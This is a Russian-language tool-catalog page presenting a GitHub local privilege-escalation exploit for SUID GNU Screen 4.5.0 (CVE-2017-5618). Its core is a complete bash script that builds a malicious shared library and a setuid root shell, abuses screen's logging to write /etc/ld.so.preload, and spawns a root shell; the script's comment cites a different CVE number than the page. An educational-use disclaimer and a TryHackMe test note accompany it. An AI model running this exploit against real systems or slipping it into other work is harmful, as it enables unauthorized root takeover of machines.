Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — Эксплойт локального повышения привилегий для GNU Screen 4.5.0 (CVE-2017-5618). Использует уязвимость в функции ведения журнала для перехвата загрузки общей библиотеки и получения root-доступа через манипуляцию ld.so.preload. Уязвим: Screen 4.5.0 (SUID) Исправлено в: Screen 4.6.0+ | Kitploit
Инструменты/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
Повышение привилегийЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

Эксплойт локального повышения привилегий для GNU Screen 4.5.0 (CVE-2017-5618). Использует уязвимость в функции ведения журнала для перехвата загрузки общей библиотеки и получения root-доступа через манипуляцию ld.so.preload. Уязвим: Screen 4.5.0 (SUID) Исправлено в: Screen 4.6.0+

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3211 месяцев назадЕщё не проверено

GNU Screen 4.5.0 Эксплойт локального повышения привилегий (CVE-2017-5618)

📌 Обзор

Эксплойт локального повышения привилегий для GNU Screen 4.5.0, перехватывающий загрузку общих библиотек для получения доступа root через манипуляцию ld.so.preload.

🔧 Технические детали

Уязвимость: CVE-2017-5618

Тип: Перехват общей библиотеки через ld.so.preload

Затрагивает: исключительно GNU Screen 4.5.0

Исправлено в: GNU Screen 4.6.0+

🎪 Цирк уязвимости

CVE: 2017-5618 🎯

Ошибка: Screen 4.5.0 создаёт файлы журнала с ОПАСНЫМИ разрешениями

Магия: Мы обманываем его, заставляя создать /etc/ld.so.preload, который загружает нашу вредоносную библиотеку

Результат: Мгновенная root-оболочка! 🐚

Скрипт 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

Скриншоты

Проверка уязвимой версии Screen.

Обнаружена версия Screen

Создание файла и установка необходимых разрешений.

Создание

Получен доступ root.

Root

Корневая оболочка получена - полный контроль над системой

⚠️ Предупреждение

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ! ⚠️ Не будьте скрипт-кидди — используйте это только на системах, которые вам принадлежат или на тестирование которых у вас есть явное разрешение.

Протестировано на

TryHackMe KOTH Room - Food

Скачать инструмент